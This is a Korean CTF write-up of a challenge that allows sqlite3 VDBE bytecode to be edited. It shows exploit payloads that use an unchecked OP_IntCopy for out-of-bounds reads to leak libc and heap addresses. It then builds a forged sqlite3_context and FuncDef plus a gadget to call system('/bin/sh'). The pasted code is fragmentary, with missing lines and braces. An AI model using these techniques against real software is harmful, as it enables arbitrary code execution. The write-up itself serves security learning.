DeadSec으로 참여했다. 당시엔 팀원분이 풀어주셔서 넘겼지만, sqlite3라 꼭 혼자 풀어보고싶었다.
SQL query를 만들고 실행시키는 프로그램이다.
여러 옵션이 존재한다.
먼저 sqlite3는 오픈소스이고 소스코드도 주어지기 때문에 일단 컴파일을 하고 구조체나 enum을 IDA로 import 했다.
inscribe 옵션에서 sqlite3의 vm 코드를 수정할 수 있는 취약점이있다.
그리고 execute로 실행하고 나면 column type에 따라 값들이 리턴된다.
sqlite3의 vmcode들을 분석해야한다.
/* forward declaration */
static int sqlite3Prepare(
sqlite3 *db, /* Database handle. */
const char *zSql, /* UTF-8 encoded SQL statement. */
int nBytes, /* Length of zSql in bytes. */
u32 prepFlags, /* Zero or more SQLITE_PREPARE_* flags */
Vdbe *pReprepare, /* VM being reprepared */
sqlite3_stmt **ppStmt, /* OUT: A pointer to the prepared statement */
const char **pzTail /* OUT: End of parsed string */
sqlite3_prepare_v3는 내부적으로 Vdbe 라는 vm 구조체를 초기화하면서 바이트 코드들을 점화한다.
이는 내부적으로 호출되는 함수의 선언부만 봐도 알 수 있다.
struct Vdbe {
sqlite3 *db; /* The database connection that owns this statement */
Vdbe **ppVPrev,*pVNext; /* Linked list of VDBEs with the same Vdbe.db */
Parse *pParse; /* Parsing context used to create this Vdbe */
ynVar nVar; /* Number of entries in aVar[] */
int nMem; /* Number of memory locations currently allocated */
int nCursor; /* Number of slots in apCsr[] */
u32 cacheCtr; /* VdbeCursor row cache generation counter */
int pc; /* The program counter */
int rc; /* Value to return */
i64 nChange; /* Number of db changes made since last reset */
int iStatement; /* Statement number (or 0 if has no opened stmt) */
i64 iCurrentTime; /* Value of julianday('now') for this statement */
i64 nFkConstraint; /* Number of imm. FK constraints this VM */
i64 nStmtDefCons; /* Number of def. constraints when stmt started */
i64 nStmtDefImmCons; /* Number of def. imm constraints when stmt started */
Mem *aMem; /* The memory locations */
Mem **apArg; /* Arguments to currently executing user function */
VdbeCursor **apCsr; /* One element of this array for each open cursor */
Mem *aVar; /* Values for the OP_Variable opcode. */
/* When allocating a new Vdbe object, all of the fields below should be
** initialized to zero or NULL */
Op *aOp; /* Space to hold the virtual machine's program */
int nOp; /* Number of instructions in the program */
int nOpAlloc; /* Slots allocated for aOp[] */
Mem *aColName; /* Column names to return */
Mem *pResultRow; /* Current output row */
char *zErrMsg; /* Error message written here */
VList *pVList; /* Name of variables */
i64 startTime; /* Time when query started - used for profiling */
int rcApp; /* errcode set by sqlite3_result_error_code() */
u32 nWrite; /* Number of write operations that have occurred */
u16 nResColumn; /* Number of columns in one row of the result set */
u16 nResAlloc; /* Column slots allocated to aColName[] */
u8 errorAction; /* Recovery action to do in case of an error */
u8 minWriteFileFormat; /* Minimum file format for writable database files */
u8 prepFlags; /* SQLITE_PREPARE_* flags */
여기서 Op 구조체를 확인하면 다음과 같다.
struct VdbeOp {
u8 opcode; /* What operation to perform */
signed char p4type; /* One of the P4_xxx constants for p4 */
u16 p5; /* Fifth parameter is an unsigned 16-bit integer */
int p1; /* First operand */
int p2; /* Second parameter (often the jump destination) */
int p3; /* The third parameter */
union p4union { /* fourth parameter */
int i; /* Integer value if p4type==P4_INT32 */
void *p; /* Generic pointer */
char *z; /* Pointer to data for string (char array) types */
i64 *pI64; /* Used when p4type is P4_INT64 */
double *pReal; /* Used when p4type is P4_REAL */
FuncDef *pFunc; /* Used when p4type is P4_FUNCDEF */
sqlite3_context *pCtx; /* Used when p4type is P4_FUNCCTX */
CollSeq *pColl; /* Used when p4type is P4_COLLSEQ */
Mem *pMem; /* Used when p4type is P4_MEM */
VTable *pVtab; /* Used when p4type is P4_VTAB */
KeyInfo *pKeyInfo; /* Used when p4type is P4_KEYINFO */
u32 *ai; /* Used when p4type is P4_INTARRAY */
SubProgram *pProgram; /* Used when p4type is P4_SUBPROGRAM */
Table *pTab; /* Used when p4type is P4_TABLE */
Expr *pExpr; /* Used when p4type is P4_EXPR */
} p4;
char *zComment; /* Comment to improve readability */
u32 iSrcLine; /* Source-code line that generated this opcode
** with flags in the upper 8 bits */
u64 nExec;
u64 nCycle;
typedef struct VdbeOp VdbeOp;
분석 속도를 높히기 위해서 앞서 분석한 내용을 토대로 Ops를 dump하는 스크립트를 작성했다.
v= '''OP_Savepoint = 0#
OP_AutoCommit = 1#
OP_Transaction = 2#
OP_Checkpoint = 3#
OP_JournalMode = 4#
OP_Vacuum = 5#
OP_VFilter = 6# /* jump, synopsis: iplan=r[P3] zplan='P4' */
OP_VUpdate = 7# /* synopsis: data=r[P3@P2] */
OP_Init = 8# /* jump, synopsis: Start at P2 */
OP_Goto = 9# /* jump */
OP_Gosub = 10# /* jump */
OP_InitCoroutine = 11# /* jump */
OP_Yield = 12# /* jump */
OP_MustBeInt = 13# /* jump */
OP_Jump = 14# /* jump */
OP_Once = 15# /* jump */
OP_If = 16# /* jump */
OP_IfNot = 17# /* jump */
OP_IsType = 18# /* jump, synopsis: if typeof(P1.P3) in P5 goto P2 */
OP_Not = 19# /* same as TK_NOT, synopsis: r[P2]= !r[P1] */
OP_IfNullRow = 20# /* jump, synopsis: if P1.nullRow then r[P3]=NULL, goto P2 */
OP_SeekLT = 21# /* jump, synopsis: key=r[P3@P4] */
OP_SeekLE = 22# /* jump, synopsis: key=r[P3@P4] */
OP_SeekGE = 23# /* jump, synopsis: key=r[P3@P4] */
OP_SeekGT = 24# /* jump, synopsis: key=r[P3@P4] */
OP_IfNotOpen = 25# /* jump, synopsis: if( !csr[P1] ) goto P2 */
OP_IfNoHope = 26# /* jump, synopsis: key=r[P3@P4] */
OP_NoConflict = 27# /* jump, synopsis: key=r[P3@P4] */
OP_NotFound = 28# /* jump, synopsis: key=r[P3@P4] */
OP_Found = 29# /* jump, synopsis: key=r[P3@P4] */
OP_SeekRowid = 30# /* jump, synopsis: intkey=r[P3] */
OP_NotExists = 31# /* jump, synopsis: intkey=r[P3] */
OP_Last = 32# /* jump */
OP_IfSmaller = 33# /* jump */
OP_SorterSort = 34# /* jump */
OP_Sort = 35# /* jump */
OP_Rewind = 36# /* jump */
OP_SorterNext = 37# /* jump */
OP_Prev = 38# /* jump */
OP_Next = 39# /* jump */
OP_IdxLE = 40# /* jump, synopsis: key=r[P3@P4] */
OP_IdxGT = 41# /* jump, synopsis: key=r[P3@P4] */
OP_IdxLT = 42# /* jump, synopsis: key=r[P3@P4] */
OP_Or = 43# /* same as TK_OR, synopsis: r[P3]=(r[P1] || r[P2]) */
OP_And = 44# /* same as TK_AND, synopsis: r[P3]=(r[P1] && r[P2]) */
OP_IdxGE = 45# /* jump, synopsis: key=r[P3@P4] */
OP_RowSetRead = 46# /* jump, synopsis: r[P3]=rowset(P1) */
OP_RowSetTest = 47# /* jump, synopsis: if r[P3] in rowset(P1) goto P2 */
OP_Program = 48# /* jump */
OP_FkIfZero = 49# /* jump, synopsis: if fkctr[P1]==0 goto P2 */
OP_IsNull = 50# /* jump, same as TK_ISNULL, synopsis: if r[P1]==NULL goto P2 */
OP_NotNull = 51# /* jump, same as TK_NOTNULL, synopsis: if r[P1]!=NULL goto P2 */
OP_Ne = 52# /* jump, same as TK_NE, synopsis: IF r[P3]!=r[P1] */
OP_Eq = 53# /* jump, same as TK_EQ, synopsis: IF r[P3]==r[P1] */
OP_Gt = 54# /* jump, same as TK_GT, synopsis: IF r[P3]>r[P1] */
OP_Le = 55# /* jump, same as TK_LE, synopsis: IF r[P3]<=r[P1] */
OP_Lt = 56# /* jump, same as TK_LT, synopsis: IF r[P3]<r[P1] */
OP_Ge = 57# /* jump, same as TK_GE, synopsis: IF r[P3]>=r[P1] */
OP_ElseEq = 58# /* jump, same as TK_ESCAPE */
OP_IfPos = 59# /* jump, synopsis: if r[P1]>0 then r[P1]-=P3, goto P2 */
OP_IfNotZero = 60# /* jump, synopsis: if r[P1]!=0 then r[P1]--, goto P2 */
OP_DecrJumpZero = 61# /* jump, synopsis: if (--r[P1])==0 goto P2 */
OP_IncrVacuum = 62# /* jump */
OP_VNext = 63# /* jump */
OP_Filter = 64# /* jump, synopsis: if key(P3@P4) not in filter(P1) goto P2 */
OP_PureFunc = 65# /* synopsis: r[P3]=func(r[P2@NP]) */
OP_Function = 66# /* synopsis: r[P3]=func(r[P2@NP]) */
OP_Return = 67#
OP_EndCoroutine = 68#
OP_HaltIfNull = 69# /* synopsis: if r[P3]=null halt */
OP_Halt = 70#
OP_Integer = 71# /* synopsis: r[P2]=P1 */
OP_Int64 = 72# /* synopsis: r[P2]=P4 */
OP_String = 73# /* synopsis: r[P2]='P4' (len=P1) */
OP_BeginSubrtn = 74# /* synopsis: r[P2]=NULL */
OP_Null = 75# /* synopsis: r[P2..P3]=NULL */
OP_SoftNull = 76# /* synopsis: r[P1]=NULL */
OP_Blob = 77# /* synopsis: r[P2]=P4 (len=P1) */
OP_Variable = 78# /* synopsis: r[P2]=parameter(P1,P4) */
OP_Move = 79# /* synopsis: r[P2@P3]=r[P1@P3] */
OP_Copy = 80# /* synopsis: r[P2@P3+1]=r[P1@P3+1] */
OP_SCopy = 81# /* synopsis: r[P2]=r[P1] */
OP_IntCopy = 82# /* synopsis: r[P2]=r[P1] */
OP_FkCheck = 83#
OP_ResultRow = 84# /* synopsis: output=r[P1@P2] */
OP_CollSeq = 85#
OP_AddImm = 86# /* synopsis: r[P1]=r[P1]+P2 */
OP_RealAffinity = 87#
OP_Cast = 88# /* synopsis: affinity(r[P1]) */
OP_Permutation = 89#
OP_Compare = 90# /* synopsis: r[P1@P3] <-> r[P2@P3] */
OP_IsTrue = 91# /* synopsis: r[P2] = coalesce(r[P1]==TRUE,P3) ^ P4 */
OP_ZeroOrNull = 92# /* synopsis: r[P2] = 0 OR NULL */
OP_Offset = 93# /* synopsis: r[P3] = sqlite_offset(P1) */
OP_Column = 94# /* synopsis: r[P3]=PX cursor P1 column P2 */
OP_TypeCheck = 95# /* synopsis: typecheck(r[P1@P2]) */
OP_Affinity = 96# /* synopsis: affinity(r[P1@P2]) */
OP_MakeRecord = 97# /* synopsis: r[P3]=mkrec(r[P1@P2]) */
OP_Count = 98# /* synopsis: r[P2]=count() */
OP_ReadCookie = 99#
OP_SetCookie =100#
OP_ReopenIdx =101# /* synopsis: root=P2 iDb=P3 */
OP_BitAnd =102# /* same as TK_BITAND, synopsis: r[P3]=r[P1]&r[P2] */
OP_BitOr =103# /* same as TK_BITOR, synopsis: r[P3]=r[P1]|r[P2] */
OP_ShiftLeft =104# /* same as TK_LSHIFT, synopsis: r[P3]=r[P2]<<r[P1] */
OP_ShiftRight =105# /* same as TK_RSHIFT, synopsis: r[P3]=r[P2]>>r[P1] */
OP_Add =106# /* same as TK_PLUS, synopsis: r[P3]=r[P1]+r[P2] */
OP_Subtract =107# /* same as TK_MINUS, synopsis: r[P3]=r[P2]-r[P1] */
OP_Multiply =108# /* same as TK_STAR, synopsis: r[P3]=r[P1]*r[P2] */
OP_Divide =109# /* same as TK_SLASH, synopsis: r[P3]=r[P2]/r[P1] */
OP_Remainder =110# /* same as TK_REM, synopsis: r[P3]=r[P2]%r[P1] */
OP_Concat =111# /* same as TK_CONCAT, synopsis: r[P3]=r[P2]+r[P1] */
OP_OpenRead =112# /* synopsis: root=P2 iDb=P3 */
OP_OpenWrite =113# /* synopsis: root=P2 iDb=P3 */
OP_BitNot =114# /* same as TK_BITNOT, synopsis: r[P2]= ~r[P1] */
OP_OpenDup =115#
OP_OpenAutoindex =116# /* synopsis: nColumn=P2 */
OP_String8 =117# /* same as TK_STRING, synopsis: r[P2]='P4' */
OP_OpenEphemeral =118# /* synopsis: nColumn=P2 */
OP_SorterOpen =119#
OP_SequenceTest =120# /* synopsis: if( cursor[P1].ctr++ ) pc = P2 */
OP_OpenPseudo =121# /* synopsis: P3 columns in r[P2] */
OP_Close =122#
OP_ColumnsUsed =123#
OP_SeekScan =124# /* synopsis: Scan-ahead up to P1 rows */
OP_SeekHit =125# /* synopsis: set P2<=seekHit<=P3 */
OP_Sequence =126# /* synopsis: r[P2]=cursor[P1].ctr++ */
OP_NewRowid =127# /* synopsis: r[P2]=rowid */
OP_Insert =128# /* synopsis: intkey=r[P3] data=r[P2] */
OP_RowCell =129#
OP_Delete =130#
OP_ResetCount =131#
OP_SorterCompare =132# /* synopsis: if key(P1)!=trim(r[P3],P4) goto P2 */
OP_SorterData =133# /* synopsis: r[P2]=data */
OP_RowData =134# /* synopsis: r[P2]=data */
OP_Rowid =135# /* synopsis: r[P2]=PX rowid of P1 */
OP_NullRow =136#
OP_SeekEnd =137#
OP_IdxInsert =138# /* synopsis: key=r[P2] */
OP_SorterInsert =139# /* synopsis: key=r[P2] */
OP_IdxDelete =140# /* synopsis: key=r[P2@P3] */
OP_DeferredSeek =141# /* synopsis: Move P3 to P1.rowid if needed */
OP_IdxRowid =142# /* synopsis: r[P2]=rowid */
OP_FinishSeek =143#
OP_Destroy =144#
OP_Clear =145#
OP_ResetSorter =146#
OP_CreateBtree =147# /* synopsis: r[P2]=root iDb=P1 flags=P3 */
OP_SqlExec =148#
OP_ParseSchema =149#
OP_LoadAnalysis =150#
OP_DropTable =151#
OP_DropIndex =152#
OP_Real =153# /* same as TK_FLOAT, synopsis: r[P2]=P4 */
OP_DropTrigger =154#
OP_IntegrityCk =155#
OP_RowSetAdd =156# /* synopsis: rowset(P1)=r[P2] */
OP_Param =157#
OP_FkCounter =158# /* synopsis: fkctr[P1]+=P2 */
OP_MemMax =159# /* synopsis: r[P1]=max(r[P1],r[P2]) */
OP_OffsetLimit =160# /* synopsis: if r[P1]>0 then r[P2]=r[P1]+max(0,r[P3]) else r[P2]=(-1) */
OP_AggInverse =161# /* synopsis: accum=r[P3] inverse(r[P2@P5]) */
OP_AggStep =162# /* synopsis: accum=r[P3] step(r[P2@P5]) */
OP_AggStep1 =163# /* synopsis: accum=r[P3] step(r[P2@P5]) */
OP_AggValue =164# /* synopsis: r[P3]=value N=P2 */
OP_AggFinal =165# /* synopsis: accum=r[P1] N=P2 */
OP_Expire =166#
OP_CursorLock =167#
OP_CursorUnlock =168#
OP_TableLock =169# /* synopsis: iDb=P1 root=P2 write=P3 */
OP_VBegin =170#
OP_VCreate =171#
OP_VDestroy =172#
OP_VOpen =173#
OP_VCheck =174#
OP_VInitIn =175# /* synopsis: r[P2]=ValueList(P1,P3) */
OP_VColumn =176# /* synopsis: r[P3]=vcolumn(P2) */
OP_VRename =177#
OP_Pagecount =178#
OP_MaxPgcnt =179#
OP_ClrSubtype =180# /* synopsis: r[P1].subtype = 0 */
OP_FilterAdd =181# /* synopsis: filter(P1) += key(P3@P4) */
OP_Trace =182#
OP_CursorHint =183#
OP_ReleaseReg =184# /* synopsis: release r[P1@P2] mask P3 */
OP_Noop =185#
OP_Explain =186#
OP_Abortable =187#
import gdb
import struct
opcode = {}
for i,j in enumerate(v.split('\n')):
opcode[i] = j.split()[0]
if i == 187:
gdb.execute('brva 0x88E1')
rdi = (gdb.parse_and_eval('*(int64_t *)($rdi+0x88)'))
inf = gdb.selected_inferior()
while True:
mem = bytes(inf.read_memory(rdi, 0x18))
p4_type = mem[1]
p5 = struct.unpack('<H',mem[2:4])[0]
p1 = struct.unpack('<I',mem[4:8])[0]
p2 = struct.unpack('<I',mem[8:12])[0]
p3 = struct.unpack('<I',mem[12:16])[0]
p4 = struct.unpack('<Q',mem[16:24])[0]
print('\tOPCODE =',opcode[mem[0]])
print('\tp5 =',p5)
print('\tp4_type =',p4_type)
print('\tp4 =',hex(p4))
print('\tp1 =',hex(p1))
print('\tp2 =',hex(p2))
print('\tp3 =',hex(p3))
rdi += 0x18
if mem[0] == 70:
위 스크립트를 이용해서 몇가지 SQL에 대한 바이트 코드가 어떻게 점화되는지 확인했다.
SELECT 0x1234
gef> source
p5 = 0
p4_type = 0
p4 = 0x0
p1 = 0x0
p2 = 0x4
p3 = 0x0
OPCODE = OP_Integer
p5 = 0
p4_type = 0
p4 = 0x0
p1 = 0x1244566
p2 = 0x1
p3 = 0x0
OPCODE = OP_ResultRow
p5 = 0
p4_type = 0
p4 = 0x0
p1 = 0x1
p2 = 0x1
p3 = 0x0
p5 = 0
p4_type = 0
p4 = 0x0
p1 = 0x0
p2 = 0x0
p3 = 0x0
OP_Init은 초기화 작업을 해주고 p2에 저장된 entrypoint로 뛰어주는 역할을 한다.
그리고 OP_ResultRow로 ResultRow를 지정한다.
마지막으로 OP_Halt로 vm 프로그램을 종료한다.
이러한 바이트 코드들은 sqlite3_step 내부에서 실행된다.
최종적으로 sqlite3VdbeExec이 호출된다.
SQLITE_PRIVATE int sqlite3VdbeExec(
Vdbe *p /* The VDBE */
Op *aOp = p->aOp; /* Copy of p->aOp */
Op *pOp = aOp; /* Current operation */
Op *pOrigOp; /* Value of pOp at the top of the loop */
int nExtraDelete = 0; /* Verifies FORDELETE and AUXDELETE flags */
u8 iCompareIsInit = 0; /* iCompare is initialized */
int rc = SQLITE_OK; /* Value to return */
sqlite3 *db = p->db; /* The database */
u8 resetSchemaOnFault = 0; /* Reset schema after an error if positive */
u8 encoding = ENC(db); /* The database encoding */
int iCompare = 0; /* Result of last comparison */
u64 nVmStep = 0; /* Number of virtual machine steps */
u64 nProgressLimit; /* Invoke xProgress() when nVmStep reaches this */
Mem *aMem = p->aMem; /* Copy of p->aMem */
Mem *pIn1 = 0; /* 1st input operand */
Mem *pIn2 = 0; /* 2nd input operand */
Mem *pIn3 = 0; /* 3rd input operand */
Mem *pOut = 0; /* Output operand */
u32 colCacheCtr = 0; /* Column cache counter */
u64 *pnCycle = 0;
int bStmtScanStatus = IS_STMT_SCANSTATUS(db)!=0;
assert( p->eVdbeState==VDBE_RUN_STATE ); /* sqlite3_step() verifies this */
if( DbMaskNonZero(p->lockMask) ){
if( db->xProgress ){
u32 iPrior = p->aCounter[SQLITE_STMTSTATUS_VM_STEP];
assert( 0 < db->nProgressOps );
nProgressLimit = db->nProgressOps - (iPrior % db->nProgressOps);
nProgressLimit = LARGEST_UINT64;
if( p->rc==SQLITE_NOMEM ){
/* This happens if a malloc() inside a call to sqlite3_column_text() or
** sqlite3_column_text16() failed. */
goto no_mem;
assert( p->rc==SQLITE_OK || (p->rc&0xff)==SQLITE_BUSY );
testcase( p->rc!=SQLITE_OK );
p->rc = SQLITE_OK;
assert( p->bIsReader || p->readOnly!=0 );
p->iCurrentTime = 0;
assert( p->explain==0 );
db->busyHandler.nBusy = 0;
if( AtomicLoad(&db->u1.isInterrupted) ) goto abort_due_to_interrupt;
if( p->pc==0
&& (p->db->flags & (SQLITE_VdbeListing|SQLITE_VdbeEQP|SQLITE_VdbeTrace))!=0
int i;
int once = 1;
if( p->db->flags & SQLITE_VdbeListing ){
printf("VDBE Program Listing:\n");
for(i=0; i<p->nOp; i++){
sqlite3VdbePrintOp(stdout, i, &aOp[i]);
if( p->db->flags & SQLITE_VdbeEQP ){
for(i=0; i<p->nOp; i++){
if( aOp[i].opcode==OP_Explain ){
if( once ) printf("VDBE Query Plan:\n");
printf("%s\n", aOp[i].p4.z);
once = 0;
if( p->db->flags & SQLITE_VdbeTrace ) printf("VDBE Trace:\n");
for(pOp=&aOp[p->pc]; 1; pOp++){
/* Errors are detected by individual opcodes, with an immediate
** jumps to abort_due_to_error. */
assert( rc==SQLITE_OK );
assert( pOp>=aOp && pOp<&aOp[p->nOp]);
#if defined(VDBE_PROFILE)
pnCycle = &pOp->nCycle;
if( sqlite3NProfileCnt==0 ) *pnCycle -= sqlite3Hwtime();
if( bStmtScanStatus ){
pnCycle = &pOp->nCycle;
*pnCycle -= sqlite3Hwtime();
/* Only allow tracing if SQLITE_DEBUG is defined.
if( db->flags & SQLITE_VdbeTrace ){
sqlite3VdbePrintOp(stdout, (int)(pOp - aOp), pOp);
test_trace_breakpoint((int)(pOp - aOp),pOp,p);
/* Check to see if we need to simulate an interrupt. This only happens
** if we have a special test build.
if( sqlite3_interrupt_count>0 ){
if( sqlite3_interrupt_count==0 ){
/* Sanity checking on other operands */
u8 opProperty = sqlite3OpcodeProperty[pOp->opcode];
if( (opProperty & OPFLG_IN1)!=0 ){
assert( pOp->p1>0 );
assert( pOp->p1<=(p->nMem+1 - p->nCursor) );
assert( memIsValid(&aMem[pOp->p1]) );
assert( sqlite3VdbeCheckMemInvariants(&aMem[pOp->p1]) );
REGISTER_TRACE(pOp->p1, &aMem[pOp->p1]);
if( (opProperty & OPFLG_IN2)!=0 ){
assert( pOp->p2>0 );
assert( pOp->p2<=(p->nMem+1 - p->nCursor) );
assert( memIsValid(&aMem[pOp->p2]) );
assert( sqlite3VdbeCheckMemInvariants(&aMem[pOp->p2]) );
REGISTER_TRACE(pOp->p2, &aMem[pOp->p2]);
if( (opProperty & OPFLG_IN3)!=0 ){
assert( pOp->p3>0 );
assert( pOp->p3<=(p->nMem+1 - p->nCursor) );
assert( memIsValid(&aMem[pOp->p3]) );
assert( sqlite3VdbeCheckMemInvariants(&aMem[pOp->p3]) );
REGISTER_TRACE(pOp->p3, &aMem[pOp->p3]);
if( (opProperty & OPFLG_OUT2)!=0 ){
assert( pOp->p2>0 );
assert( pOp->p2<=(p->nMem+1 - p->nCursor) );
memAboutToChange(p, &aMem[pOp->p2]);
if( (opProperty & OPFLG_OUT3)!=0 ){
assert( pOp->p3>0 );
assert( pOp->p3<=(p->nMem+1 - p->nCursor) );
memAboutToChange(p, &aMem[pOp->p3]);
pOrigOp = pOp;
switch( pOp->opcode ){
** What follows is a massive switch statement where each case implements a
** separate instruction in the virtual machine. If we follow the usual
** indentation conventions, each case should be indented by 6 spaces. But
** that is a lot of wasted space on the left margin. So the code within
** the switch statement will break with convention and be flush-left. Another
** big comment (similar to this one) will mark the point in the code where
** we transition back to normal indentation.
** The formatting of each case is important. The makefile for SQLite
** generates two C files "opcodes.h" and "opcodes.c" by scanning this
** file looking for lines that begin with "case OP_". The opcodes.h files
** will be filled with #defines that give unique integer values to each
** opcode and the opcodes.c file is filled with an array of strings where
** each string is the symbolic name for the corresponding opcode. If the
** case statement is followed by a comment of the form "/# same as ... #/"
** that comment is used to determine the particular value of the opcode.
** Other keywords in the comment that follows each case are used to
** construct the OPFLG_INITIALIZER value that initializes opcodeProperty[].
** Keywords include: in1, in2, in3, out2, out3. See
** the mkopcodeh.awk script for additional information.
** Documentation about VDBE opcodes is generated by scanning this file
** for lines of that contain "Opcode:". That line and all subsequent
** comment lines are used in the generation of the opcode.html documentation
** file.
** Formatting is important to scripts that scan this file.
** Do not deviate from the formatting style currently in use.
/* Opcode: Goto * P2 * * *
** An unconditional jump to address P2.
** The next instruction executed will be
** the one at index P2 from the beginning of
** the program.
** The P1 parameter is not actually used by this opcode. However, it
** is sometimes set to 1 instead of 0 as a hint to the command-line shell
** that this Goto is the bottom of a loop and that the lines from P2 down
** to the current line should be indented for EXPLAIN output.
case OP_Goto: { /* jump */
/* In debugging mode, when the p5 flags is set on an OP_Goto, that
** means we should really jump back to the preceding OP_ReleaseReg
** instruction. */
if( pOp->p5 ){
assert( pOp->p2 < (int)(pOp - aOp) );
assert( pOp->p2 > 1 );
pOp = &aOp[pOp->p2 - 2];
assert( pOp[1].opcode==OP_ReleaseReg );
goto check_for_interrupt;
이런식으로 Opcode에 따라 switch case로 처리한다.
먼저 악용할만한 opcode를 먼저 찾으려고 주석으로 달린 synopsis를 읽었다.
OP_Copy = 80# /* synopsis: r[P2@P3+1]=r[P1@P3+1] */
OP_SCopy = 81# /* synopsis: r[P2]=r[P1] */
OP_IntCopy = 82# /* synopsis: r[P2]=r[P1]
Copy 계열 명령어를 보다가 IntCopy를 쓰기로 결정했다.
/* Opcode: IntCopy P1 P2 * * *
** Synopsis: r[P2]=r[P1]
** Transfer the integer value held in register P1 into register P2.
** This is an optimized version of SCopy that works only for integer
** values.
case OP_IntCopy: { /* out2 */
pIn1 = &aMem[pOp->p1];
assert( (pIn1->flags & MEM_Int)!=0 );
pOut = &aMem[pOp->p2];
sqlite3VdbeMemSetInt64(pOut, pIn1->u.i);
기본적으로 prepare로 점화된 바이트 코드를 신뢰하기 때문에 별도의 boundary check가 없다.
그래서 memory에 대한 Out of bound read가 가능해진다.
struct sqlite3_value
MemValue u;
char *z;
int n;
u16 flags;
u8 enc;
u8 eSubtype;
sqlite3 *db;
int szMalloc;
u32 uTemp;
char *zMalloc;
void (*xDel)(void *);
그런데 약간 성가신게 메모리 배열의 하나의 원소가 sqlite3_value라서 0x38의 배수 단위로만 메모리 액세스가 가능했다.
실제 메모리 구조체의 첫 8바이트만 액세스가 가능하니 유효한 주소를 유출할 수 있도록 0x38의 배수 단위로 탐색을 진행했다.
import gdb
import struct
y = int(input('base sqliteMem: '),16)
inf = gdb.selected_inferior()
for i in range(200):
mem = struct.unpack('<Q',inf.read_memory(y-0x38*i, 0x8))
print(hex(y-0x38*i) + f'({-i})' +' : ' + hex(mem[0]))
Memory leak
payload = b'SELECT '
for i in range(0x20):
payload += f'(SELECT {i}),'.encode()
payload = payload[:-1]
pc = 1
payload = compile(OP_Init, 0, pc) # jmp to pc
payload += compile(OP_Integer,0x1, 1)
payload += compile(OP_IntCopy, (-146)&0xffffffff, 1)
payload += compile(OP_ResultRow, 1, 1) # p2 = col count
payload += compile(OP_Halt)
modify_opcode(1, payload)
libc_base = int(p.recvuntil(b' ')[:-1]) - 0x21ace0
OP_SCopy = 81# /* synopsis: r[P2]=r[P1] */
OP_IntCopy = 82# /* synopsis: r[P2]=r[P1] */
payload = compile(OP_Init, 0, pc) # jmp to pc
payload += compile(OP_Integer,0x1, 1)
payload += compile(OP_IntCopy, (-0xb8)&0xffffffff, 1)
payload += compile(OP_ResultRow, 1, 1) # p2 = col count
payload += compile(OP_Halt)
modify_opcode(1, payload)
heap_base = int(p.recvuntil(b' ')[:-1])-0x14578
일부러 SELECT 하고 서브 쿼리를 많이 추가해서 nOps를 늘린 상태에서 opcode를 수정했다.
Code Execution
Code execution전에 먼저 memory에 연속적으로 원하는 데이터를 쓸 수 있어야한다.
sqlite3의 blob 데이터 타입을 이용하면 heap 영역에 연속적으로 데이터를 쓸 수 있다.
위 primitive를 이용해서 객체의 주소를 변조하고 그 객체의 virtual function call을 가로채는 방법이 충분히 가능할 것이라고 생각했다.
모든 Opcode를 살펴봤지만, vfcall(controllable_rdi)의 꼴인 함수 호출이 존재하지 않았다.
one gadget을 사용하지 않고 좀 더 안정적인 익스플로잇을 위해서 구조체 변조가 쉽고 가능한 많은 인자가 컨트롤 가능한 Opcode를 찾았다.
case OP_PureFunc: /* group */
case OP_Function: { /* group */
int i;
sqlite3_context *pCtx;
assert( pOp->p4type==P4_FUNCCTX );
pCtx = pOp->p4.pCtx;
/* If this function is inside of a trigger, the register array in aMem[]
** might change from one evaluation to the next. The next block of code
** checks to see if the register array has changed, and if so it
** reinitializes the relevant parts of the sqlite3_context object */
pOut = &aMem[pOp->p3];
if( pCtx->pOut != pOut ){
pCtx->pVdbe = p;
pCtx->pOut = pOut;
pCtx->enc = encoding;
for(i=pCtx->argc-1; i>=0; i--) pCtx->argv[i] = &aMem[pOp->p2+i];
assert( pCtx->pVdbe==p );
memAboutToChange(p, pOut);
for(i=0; i<pCtx->argc; i++){
assert( memIsValid(pCtx->argv[i]) );
REGISTER_TRACE(pOp->p2+i, pCtx->argv[i]);
MemSetTypeFlag(pOut, MEM_Null);
assert( pCtx->isError==0 );
(*pCtx->pFunc->xSFunc)(pCtx, pCtx->argc, pCtx->argv);/* IMP: R-24505-23230 */
/* If the function returned an error, throw an exception */
if( pCtx->isError ){
if( pCtx->isError>0 ){
sqlite3VdbeError(p, "%s", sqlite3_value_text(pOut));
rc = pCtx->isError;
sqlite3VdbeDeleteAuxData(db, &p->pAuxData, pCtx->iOp, pOp->p1);
pCtx->isError = 0;
if( rc ) goto abort_due_to_error;
assert( (pOut->flags&MEM_Str)==0
|| pOut->enc==encoding
|| db->mallocFailed );
assert( !sqlite3VdbeMemTooBig(pOut) );
REGISTER_TRACE(pOp->p3, pOut);
조건도 heap base를 알고 있으므로 아주 쉽게 우회가 가능하다.
struct sqlite3_context {
Mem *pOut; /* The return value is stored here */
FuncDef *pFunc; /* Pointer to function information */
Mem *pMem; /* Memory cell used to store aggregate context */
Vdbe *pVdbe; /* The VM that owns this context */
int iOp; /* Instruction number of OP_Function */
int isError; /* Error code returned by the function. */
u8 enc; /* Encoding to use for results */
u8 skipFlag; /* Skip accumulator loading if true */
u8 argc; /* Number of arguments */
sqlite3_value *argv[1]; /* Argument set */
struct FuncDef {
i8 nArg; /* Number of arguments. -1 means unlimited */
u32 funcFlags; /* Some combination of SQLITE_FUNC_* */
void *pUserData; /* User data parameter */
FuncDef *pNext; /* Next function with same name */
void (*xSFunc)(sqlite3_context*,int,sqlite3_value**); /* func or agg-step */
void (*xFinalize)(sqlite3_context*); /* Agg finalizer */
void (*xValue)(sqlite3_context*); /* Current agg value */
void (*xInverse)(sqlite3_context*,int,sqlite3_value**); /* inverse agg-step */
const char *zName; /* SQL name of the function. */
union {
FuncDef *pHash; /* Next with a different name but the same hash */
FuncDestructor *pDestructor; /* Reference counted destructor function */
} u; /* pHash if SQLITE_FUNC_BUILTIN, pDestructor otherwise */
system("/bin/sh")를 호출하기 위해서는 한번의 code reuse가 필요하다.
호출시에 rdi == rax이고 rdi는 현재 객체이다.
그래서 다음과 같은 가젯을 이용한다.
0x000000000009097f : mov rdi, qword ptr [rdi + 0x10] ; call qword ptr [rax + 0x360]
위 가젯을 이용해서 자기 자신 객체를 다시 참조해서 rdi를 수정하고 호출한다.
# sqlite3_context
payload = b'' # scopy 0x18
payload += p64(mem_start + 0x0) # Mem * pOut <- Mem[0] address, p3 must be 0
payload += p64(payload_start+0x38) # FuncDef *pFunc
payload += p64(payload_start + 0x18) # /bin/sh
payload += b'/bin/sh\x00'
